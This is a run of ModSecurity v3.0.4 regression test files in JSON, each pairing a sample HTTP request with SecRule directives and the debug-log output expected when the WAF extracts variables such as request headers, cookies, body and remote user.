"Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Accept\" \\(Variable: REQUEST_HEADERS_NAMES:Accept\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Content-Length\" \\(Variable: REQUEST_HEADERS_NAMES:Content-Length\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Content-Type\" \\(Variable: REQUEST_HEADERS_NAMES:Content-Type\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS_NAMES", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Expect\" \\(Variable: REQUEST_HEADERS_NAMES:Expect\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_HEADERS.json0000644000175000017500000000340113607066010026655 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_HEADERS", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"localhost\" \\(Variable: REQUEST_HEADERS:Host\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_FILENAME.json0000644000175000017500000000201613607066010026763 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_FILENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/login.php?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/one/two/login.php\" \\(Variable: REQUEST_FILENAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_FILENAME \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json0000644000175000017500000000736013607066010027631 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES_NAMES (1/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"USER_TOKEN\" \\(Variable: REQUEST_COOKIES_NAMES:USER_TOKEN\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES_NAMES (2/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"a\" \\(Variable: REQUEST_COOKIES_NAMES:a\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES_NAMES (3/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"t\" \\(Variable: REQUEST_COOKIES_NAMES:t\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES_NAMES (4/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b; foobar" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"foobar\"" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES_NAMES \"@contains foobar \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_COOKIES.json0000644000175000017500000001304013607066010026676 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (1/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Yes\" \\(Variable: REQUEST_COOKIES:USER_TOKEN\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (2/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"z\" \\(Variable: REQUEST_COOKIES:a\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (3/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"b\" \\(Variable: REQUEST_COOKIES:t\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (4/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b; foo= bar" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"bar\"" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (5/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"USER_TOKEN=Yes; a=z; t=b; foo= bar; = ; = = ; baz=value1=insert here something" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value1=insert here something\"" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_COOKIES (6/6)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie":"aaa=bbb;abc=def " }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"def\" \\(Variable: REQUEST_COOKIES:abc\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_COOKIES:abc \"@rx ^def$\" \"id:1,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json0000644000175000017500000000344313607066010027406 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_BODY_LENGTH", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"508\" \\(Variable: REQUEST_BODY_LENGTH\\)" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_BODY_LENGTH \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_BODY.json0000644000175000017500000000345513607066010026350 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_BODY", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"--------------------------756b6d74fa1a8ee2\\x0aContent-Disposition: form-data; na" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_BODY \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQUEST_BASENAME.json0000644000175000017500000000376213607066010026767 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_BASENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/login.php?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"login.php\" \\(Variable: REQUEST_BASENAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_BASENAME \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQUEST_BASENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/my_app.asp?apath=/my/cool/path.com", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"my_app.asp\" \\(Variable: REQUEST_BASENAME\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_BASENAME \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json0000644000175000017500000001046013607066010030112 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQBODY_PROCESSOR_ERROR_MSG (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "http_version":1.1, "method":"POST", "body": [ "", "", "", "Everyday Italian", "Giada De Laurentiis", "2005", "30.00", "", "", "Harry Potter", "J K. Rowling", "2005", "29.99", "", "", "XQuery Kick Start", "James McGovern", "Per Bothner", "Kurt Cagle", "James Linn", "Vaidyanathan Nagarajan", "2003", "49.99", "", "", "Learning XML", "Erik T. Ray", "2003", "39.95", "", "" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"XML parsing error: XML: Failed parsing document" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQBODY_PROCESSOR_ERROR \"@contains test\" \"phase:2,id:1,pass,t:trim\"", "SecRule REQBODY_PROCESSOR_ERROR_MSG \"@contains test\" \"phase:2,id:2,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQBODY_PROCESSOR_ERROR_MSG (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2" }, "uri":"/?key=value&key=other_value", "http_version":1.1, "method":"POST", "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file.." ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart parsing error: Multipart: Final boundary missing." }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQBODY_PROCESSOR_ERROR \"@contains test\" \"phase:2,id:1,pass,t:trim\"", "SecRule REQBODY_PROCESSOR_ERROR_MSG \"@contains test\" \"phase:2,id:2,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REQBODY_PROCESSOR.json0000644000175000017500000001205513607066010027143 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQBODY_PROCESSOR (1/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Type": "text/xml" }, "uri":"/?key=value&key=other_value", "http_version":1.1, "method":"POST", "body": [ "", "", "", "Everyday Italian", "Giada De Laurentiis", "2005", "30.00", "", "", "Harry Potter", "J K. Rowling", "2005", "29.99", "", "", "XQuery Kick Start", "James McGovern", "Per Bothner", "Kurt Cagle", "James Linn", "Vaidyanathan Nagarajan", "2003", "49.99", "", "", "Learning XML", "Erik T. Ray", "2003", "39.95", "", "" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"XML\" \\(Variable: REQBODY_PROCESSOR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQBODY_PROCESSOR \"@contains test\" \"id:1,pass,phase:2,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQBODY_PROCESSOR (2/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2" }, "uri":"/?key=value&key=other_value", "http_version":1.1, "method":"POST", "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"MULTIPART\" \\(Variable: REQBODY_PROCESSOR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQBODY_PROCESSOR \"@contains test\" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REQBODY_PROCESSOR (3/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/?key=value&key=other_value", "http_version":1.1, "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"URLENCODED\" \\(Variable: REQBODY_PROCESSOR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQBODY_PROCESSOR \"@contains test\" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REMOTE_USER.json0000644000175000017500000000201113607066010026217 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_USER", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpPcGVuU2VzYW1l" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"t:trim: \"Aladdin\"" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_USER \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REMOTE_PORT.json0000644000175000017500000000371313607066010026237 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_PORT", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"123\" \\(Variable: REMOTE_PORT\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_PORT \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_PORT", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"::1", "port":80 }, "request":{ "headers":{ "Host":"localhost", 